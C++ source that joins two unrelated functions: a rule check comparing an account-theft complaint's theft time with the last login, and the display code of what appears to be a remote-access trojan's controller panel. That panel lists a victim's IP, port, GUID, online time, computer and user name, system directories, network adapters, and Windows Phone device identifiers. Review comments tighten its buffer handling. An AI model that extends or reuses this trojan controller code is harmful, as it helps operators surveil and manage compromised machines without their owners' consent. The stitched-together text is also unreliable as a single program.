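/**
 * Rule check: the reported theft time is compared against the last login time.
 * (Original note: the rule is met when the theft time is later than the last login.)
 *
 * @param info  complaint record; stLastLogin and stRobeLogin are read via c_str().
 * @return 0 when GetDiffTime(robbedTime, lastLogin) is negative, 1 otherwise.
 */
int RobRuleValid::ProCheckLastTime(Rob_Ics_Complaint &info)
{
    // Both timestamps come from the complaint record and have no length limit
    // visible here, so the copies are bounded to the local buffers; an
    // over-long value is truncated instead of overrunning the stack.
    char szLastLogin[256];
    snprintf(szLastLogin, sizeof(szLastLogin), "%s", info.stLastLogin.c_str());

    char szRobedTime[256];
    snprintf(szRobedTime, sizeof(szRobedTime), "%s", info.stRobeLogin.c_str());

    // NOTE(review): GetDiffTime is defined elsewhere; presumably it returns
    // (first - second) and accepts these strings as-is — confirm, including
    // how it reports an unparsable or truncated timestamp.
    return (GetDiffTime(szRobedTime, szLastLogin) < 0) ? 0 : 1;
}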
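/**
 * Rebuilds the tree view from one host record and its connection record.
 *
 * @param body   host record. Read as a packed Windows Phone record when the
 *               connection record reports OS_WINDOWS_PHONE, otherwise as a
 *               struct system_info.
 * @param body2  connection record (struct TrojanInfo).
 *
 * Packed Windows Phone record, in the order this function reads it:
 * NUL-terminated ANID, 20-byte device id, then NUL-terminated device name,
 * manufacturer, firmware version and hardware version, an 8-byte memory size
 * (displayed divided by 1024*1024) and a 2-byte battery state.
 *
 * NOTE(review): both records originate from the remote endpoint and no length
 * is passed in, so this function cannot verify that the NUL terminators and
 * fixed-size fields lie inside the received buffer. The caller has to validate
 * the record size before calling; a malformed record leads to out-of-bounds
 * reads here.
 */
void InfoFrom::InsertData(void* body, void* body2)
{
    char buffer[128];
    int os = OS_NOTDEFINED;

    m_treeList.DeleteAllItems();

    // Nothing to display without both records (the original dereferenced them unchecked).
    if(body == NULL || body2 == NULL)
        return;

    struct TrojanInfo* trojan = static_cast<struct TrojanInfo*>(body2);

    if(trojan->bOnlineFlag && trojan->s)
    {
        os = trojan->ostype;
        int t = time(NULL) - trojan->timestamp;

        InsertPair("IP地址", trojan->trojanip);
        sprintf(buffer, "%d", trojan->port);      // integer-only format, fits in buffer
        InsertPair("端口号", buffer);
        InsertPair("GUID", trojan->guid);

        // Bounded copy: the length of the GetDiffTime() result is not known here.
        strncpy(buffer, GetDiffTime(t), sizeof(buffer) - 1);
        buffer[sizeof(buffer) - 1] = '\0';
        InsertPair("上线时间", buffer);
    }

    if(os == OS_WINDOWS_PHONE)
    {
        // The body is a packed byte record in this case, not a system_info.
        char* anid = static_cast<char*>(body);
        char* p = anid;
        InsertPair("ANID", anid);
        while(*p) p++;

        // 20 raw bytes rendered as 40 hex digits plus the terminator.
        unsigned char* uId = reinterpret_cast<unsigned char*>(++p);
        p += 20;
        char uuid[40 + 1];
        for(int i = 0; i < 20; i++)
            sprintf(uuid + i * 2, "%02x", uId[i]);
        InsertPair("设备ID", uuid);

        char* devicename = p;
        while(*p) p++;
        InsertPair("设备名", devicename);

        char* manufacture = ++p;
        while(*p) p++;
        InsertPair("设备制造商", manufacture);

        char* firmware = ++p;
        while(*p) p++;
        InsertPair("固件版本", firmware);

        char* hardware = ++p;
        while(*p) p++;
        InsertPair("硬件版本", hardware);

        // memcpy avoids an unaligned load from the packed record.
        __int64 memory;
        memcpy(&memory, ++p, sizeof(memory));
        // The original passed the 64-bit quotient to "%d"; convert explicitly
        // so the argument matches the format specifier.
        sprintf(buffer, "%d MB", static_cast<int>(memory / (1024 * 1024)));
        InsertPair("设备内存", buffer);
        p += 8;

        unsigned short battery;
        memcpy(&battery, p, sizeof(battery));
        InsertPair("电池状态", battery == 0 ? "未在充电" : "正在充电");

        // Commented-out code in the original indicates a network-connection-type
        // string follows the battery field; it is not displayed.
        return;
    }

    // The original had an OS_WINDOWS check with an "unknown operating system"
    // fallback commented out, so every other record is read as a system_info.
    // Its fields are read only on this path, so the (possibly shorter) packed
    // record above is never accessed through the system_info layout.
    struct system_info* info = static_cast<struct system_info*>(body);
    struct network_info* nws = info->networks;
    int cntNW = info->cntNW;

    // Bounded copy: the length of the GetOSVersion() result is not known here.
    strncpy(buffer,
            GetOSVersion(info->windows.majorVersion, info->windows.minorVersion,
                         info->windows.platformId, info->windows.productType,
                         info->windows.buildNumber),
            sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';
    InsertPair("操作系统", buffer);

    // NOTE(review): the string fields below are passed on as received; confirm
    // that the receiver guarantees NUL termination inside each field.
    InsertPair("BIOS", info->biosDesc);
    InsertPair("CPU类型", info->cpuDesc);
    sprintf(buffer, "%d", info->cpuCount);
    InsertPair("CPU数目", buffer);
    // NOTE(review): assumes totalMemory/availMemory are int-sized — TODO confirm,
    // otherwise "%d" does not match the argument type.
    sprintf(buffer, "物理内存%d MB(空闲%d MB)", info->totalMemory/1024, info->availMemory/1024);
    InsertPair("内存大小", buffer);
    InsertPair("计算机名", info->computerName);
    InsertPair("用户名", info->userName);
    InsertPair("系统目录", info->sysDir);
    InsertPair("WINDOWS目录", info->winDir);

    if(cntNW)
    {
        // NOTE(review): cntNW comes from the record and is not checked against
        // the capacity of info->networks — validate it before this loop.
        HTREEITEM networkparent = InsertPair("网络适配器", NULL);
        for(int i = 0; i < cntNW; i++)
        {
            HTREEITEM parent = InsertPair(nws[i].name, NULL, networkparent);
            InsertPair("IP地址", nws[i].ip, parent);
            // strcmp() is non-zero when the value differs from "0.0.0.0".
            if(strcmp(nws[i].gateway, "0.0.0.0"))
                InsertPair("默认网关", nws[i].gateway, parent);
            if(strcmp(nws[i].mask, "0.0.0.0"))
                InsertPair("子网掩码", nws[i].mask, parent);
        }
        m_treeList.Expand(networkparent, TVE_EXPAND);
    }
}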